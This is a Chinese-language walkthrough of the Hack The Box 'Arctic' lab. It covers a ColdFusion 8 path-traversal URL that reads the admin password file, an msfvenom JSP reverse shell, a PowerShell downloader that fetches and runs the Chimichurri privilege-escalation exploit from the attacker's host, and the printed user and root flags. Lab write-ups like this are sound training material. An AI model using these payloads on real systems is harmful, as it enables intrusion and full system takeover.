环境介绍:
名称:Arctic
系统:Windows
信息搜集
获取目标
1
2
3
4
5
6
7
8
9
10
11
12
13
|
$ nmap -A 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at
Nmap scan report for 10.10.10.11
Host is up (0.33s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
|
- 这里可以看出
135
和8500``49154
开放,系统为windows系统。
135 端口
1
2
3
4
|
$ nmap -p 135 --script vuln 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-28 14:02 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 13.46 seconds
|
8500 端口
web漏洞枚举
exp
1
|
$ searchsploit ColdFusion
|
- 搜索漏洞,发现有一个任意文件读取可用,
CVE 2010-2861
。
复现
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
解码
提供一个在线解码的地址:
https://hashtoolkit.com/reverse-sha1-hash
shell获取
信息搜集
生成 shell
1
|
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.16 LPORT=12345 -f raw > icekamrec.jsp
|
开启http
1
|
$ python -m SimpleHTTPServer 80
|
监听NC
提交
C:\ColdFusion8\wwwroot\CFIDE\icekamrec.jsp
- 网页提交后我这里没有自动运行,需要手动点下运行并curl shell。
1
|
curl http://10.10.10.11:8500/CFIDE/icekamrec.jsp
|
获得shell
flag user
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
C:\Users\tolis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is F88F-4EA5
Directory of C:\Users\tolis\Desktop
22/03/2017 09:00 �� <DIR> .
22/03/2017 09:00 �� <DIR> ..
22/03/2017 09:01 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 33.180.786.688 bytes free
C:\Users\tolis\Desktop>type user.txt
type user.txt
02650d3a69a70780c302e146a6cb96f3
|
提权
系统漏洞枚举
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 29/10/2019, 7:44:31 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 217 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.173 MB
Virtual Memory: In Use: 874 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
- 将系统信息保存为文件放到
Windows-Exploit-Suggester
跑一波。
$ ./windows-exploit-suggester.py --database 2019-10-28-mssb.xls --systeminfo /tmp/systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
poc下载
1
|
$ proxychains git clone https://github.com/Re4son/Chimichurri.git
|
监听http
1
2
3
|
$ cd Chimichurri
$ python -m SimpleHTTPServer 80
|
监听新NC
下载poc
C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\ColdFusion8>echo $url = "http://10.10.14.16/Chimichurri.exe" >>wget.ps1
echo $url = "http://10.10.14.16/Chimichurri.exe" >>wget.ps1
C:\ColdFusion8>echo $file = "icekam.exe" >>wget.ps1
echo $file = "icekam.exe" >>wget.ps1
C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
C:\ColdFusion8>icekam.exe 10.10.14.16 4433
- 使用powershell脚本进行下载,也可以使用一句话终端或者msf进行上传。
root flag
$ nc -nlvp 4433
listening on [any] 4433 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.11] 51706
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8>whoami
whoami
nt authority\system
cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>root.txt
root.txt
c:\Users\Administrator\Desktop>type root.txt
type root.txt
ce65ceee66b2b5ebaff07e50508ffb90
c:\Users\Administrator\Desktop>```
## 心得
两层反弹经典Windows提权,很好的思路。